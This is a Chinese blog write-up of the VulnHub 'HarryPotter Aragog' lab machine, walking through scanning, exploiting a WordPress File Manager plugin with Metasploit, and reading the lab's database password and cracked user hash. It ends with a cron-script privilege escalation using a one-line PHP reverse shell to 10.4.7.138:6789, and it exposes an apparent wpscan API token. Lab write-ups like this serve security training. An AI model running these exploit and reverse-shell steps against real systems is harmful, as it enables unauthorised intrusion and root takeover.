harrypotter1-aragog靶机攻略

最新推荐文章于 2024-07-19 16:27:02 发布
最新推荐文章于 2024-07-19 16:27:02 发布
阅读量504 收藏
点赞数
分类专栏: 靶机系列 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134045584
版权

harrypotter1

扫描

nmap

image-20231025101926058

指纹

image-20231025102022349

目录

image-20231025102451954

渗透

image-20231025103442496

找到了登录位置

image-20231025103749120

看到wordpress就用wpscan扫一扫

wpscan --url="http://10.4.7.153/blog" -e p --plugins-detection aggressive --api-token=d1fuMZc2tbhJWYk9VfNsl0GZlyYxkfH6bpL0pCKFhok

扫描出有这些file manager漏洞

image-20231025220100806

使用msf搜一下这个漏洞

image-20231025221347863

此处选择使用exploit/multi/http/wp_file_manager_rce

名字完全契合

配置完成后运行获取shell,注意要配置targeturi参数

使用该命令获取回显

/usr/bin/script -qc /bin/bash /dev/null

在hagrid98的家目录下发现疑似密码文件

image-20231025222219207

horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

解码结果如图

image-20231025222356126

wordpress文件夹在etc下,进去看看发现config配置文件

得到数据库的用户信息

root:mySecr3tPass

image-20231025222603805

登入数据库

mysql -uroot -p

在wordpress数据库的wp-users表中发现用户信息

image-20231025222902096

hagrid98:$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.

hash-identifier识别一下密码类型

image-20231025223010406

拿去md5解密,得到

image-20231025223111380

hagrid98:password123

提权

ssh连接登录成功

image-20231025223354478

在/opt文件夹下发现脚本文件,查看内容,是将下载内容复制到tmp路径下,该脚本可能为一个定时执行的任务

将该脚本文件更改为如图内容

image-20231025224703079

进入/tmp增加一个php文件,将下面反弹命令写入

<?php $sock=fsockopen("10.4.7.138",6789);exec("/bin/sh -i <&3 >&3 2>&3");?>

image-20231025230234392

开启监听端口

image-20231025224830631

等待一会提权成功

image-20231025230039782

获取第二个

image-20231025230107184

order libra
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机ARAGOG (1.0.2)
Tswcbyy_hp的博客
07-21 436
实验环境 主机 ip 攻击机 192.168.48.128 靶机 192.168.48.136 攻击过程 信息收集 扫描网段,找到目标靶机的IP地址 详细扫描端口,发现打开了两个端口,22和80 有80端口,肯定有个网站,在浏览器打开网站 只有一个霍格瓦茨魔法学院大战图 dirb扫描网络,找到不少地址 漏洞利用 打开第一个目录blog 看到的是wordpress的blog网站 点击notice,提示说未知的host 可以看到除了主页以外,其余所有的网站都要访问这个host
VulnHub_HarryPotter:Aragog (1.0.2)靶机
学术渣渣的博客
08-01 1375
靶机介绍 下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/ 作者Mansoor R在VulnHub上上传了哈利波特系列,这个系列有三个靶机,以哈利波特为故事背景,玩家需要找到这三个靶机中的共8个魂器,打败伏地魔!这就冲起来! 首先是第一个靶机Aragog,以《哈利波特·密室》中的海格饲养的大蜘蛛阿拉戈命名,题目中提示这个靶机里面有两个魂器。 渗透过程 从VlunHub上下载靶机,在virtualbox上打开,设置网络为桥接。 打开
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
DdddddXxxxx的博客
05-06 1187
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
【VulnHub靶场】——HARRYPOTTER第一部: ARAGOG (1.0.2)
Demo不是emo的博客
09-30 3146
​ 今天的博客内容是HARRYPOTTER: ARAGOG (1.0.2)教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场平台入口在这,推荐大家使用,大家进去直接搜索HARRYPOTTER: ARAGOG (1.0.2)就能下载今天的靶场了,也可以找我拿,开始对今天靶场的介绍 ​
【Vulnhub靶机HarryPotter-Aragog-1.0.2 漏洞复现
weixin_65900584的博客
02-26 1265
学习如何对 靶机 HarryPotter-Aragog-1.0.2 进行提权
Harry Potter Quotes-crx插件
04-06
语言:English (United States) 引用JK罗琳(JK Rowling)和她举世闻名的《哈利·波特(Harry Potter)》系列,为您的一天增添魔力! 只需单击您的Chrome浏览器中的图标即可获取报价。
harry-potter-spells:哈利·波特法术清单
05-22
$ yarn add harry-potter-spells 用法 const harryPotterSpells = require ( 'harry-potter-spells' ) console . log ( harryPotterSpells . random ( ) ) // => { "name": "Crucio", "type": "curse", "effect": ...
Harry-Potter-Theme-Quiz
05-20
哈利·波特主题测验 ... 单击“开始游戏”按钮后,此测验将成功显示问题。 有一个30秒倒计时的计时器,如果选择了答案或在测验仍​​在进行时计时器减少到0,计时器将重置为30。 回答问题或计时器达到0时,将出现新问题...
Harry-Potter-Game-V1:TP1哈利·波特游戏
05-26
您想用哈利·波特(Harry Potter)为主题制作基于回合的战斗游戏。 游戏的动态是2个角色可以在死亡对决中相互面对。 规则和游戏功能: ●游戏中要选择的角色分为2组:魔术师和精灵。 ●决斗中选择使用的法术分为3...
Harry-Potter-API
03-27
哈里·波特API API链接
Aragog-1.0.2靶机
ybkj6666的博客
11-03 161
使用arp-scan找目标ip,这边可以得知我们的目标ip为192.168.187.165输入命令: 发现了2个端口开放输入命令: 这边没有扫描到udp端口输入命令: 输入命令: 但是没有扫描到扫描可利用的漏洞点页面就是一张图片(哈利波特可还行)使用dirsearch和gobuster两个工具进行目录爆破输入命令: 这里扫描到了几个目录,等下去看看怎么个事输入命令: 我们在查看这个blog目录的时候,发现跳转到了新的页面。如果页面显示不正常的话,可能是页面没有解析的原因,就像下图这样此时我们需要以root的
靶机11:Aragog-1.0.2
wj33333的博客
10-31 48
1.arp-scan -l扫描,寻找靶机2.nmap扫描端口查看80端口3.dirsearch 扫描目录访问WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。那么思路就是找到这个版本的WordPress有什么插件的漏洞。
vulnhub_HARRYPOTTER: ARAGOG (1.0.2)
qq_45434762的博客
06-13 4822
主机信息kali: 192.168.1.12 Momentum:192.168.1.101 信息收集通过nmap扫描目标主机发现仅开放22、80端口nmap -T4 -A -v -p- 1...
hackthebox - Aragog (考点:ftp & xxe攻击 & 修改php代码提权)
冬萍子癸水
05-30 494
1 扫描 21想到ftp进去找东西,都提示了匿名可进,里面有个test文件,好直白。。 22想到可能有ssh登录 80进web信息搜集 C:\root> nmap -A 10.10.10.78 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:03 EDT Nmap scan report for 10.10.10.78 Host is up (0.25s latency). Not shown: 872 closed ports, 12
No.124-HackTheBox-Linux-Aragog-Walkthrough渗透学习
qq_34801745的博客
06-05 383
** HackTheBox-Linux-Aragog-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/126 靶机难度:中级(4.8/10) 靶机发布日期:2018年7月21日 靶机描述: Aragog is not overly challenging, however it touches on several common real-world vulnerabilities, techniques and mis
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8339
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 538
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
最新发布
亚信安全官方账号的博客
07-19 283
一站式云安全托管限时试用 开启全能高效攻防
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 770
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
Harry Potter 英文词频统计python代码
05-26
以下是一个简单的 Python 代码,用于统计《哈利波特》(Harry Potter)第一部小说中单词的出现频率。需要注意的是,这个代码只是一个基础的示例,可能需要根据具体情况进行修改和优化。 ```python # 导入所需的库 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值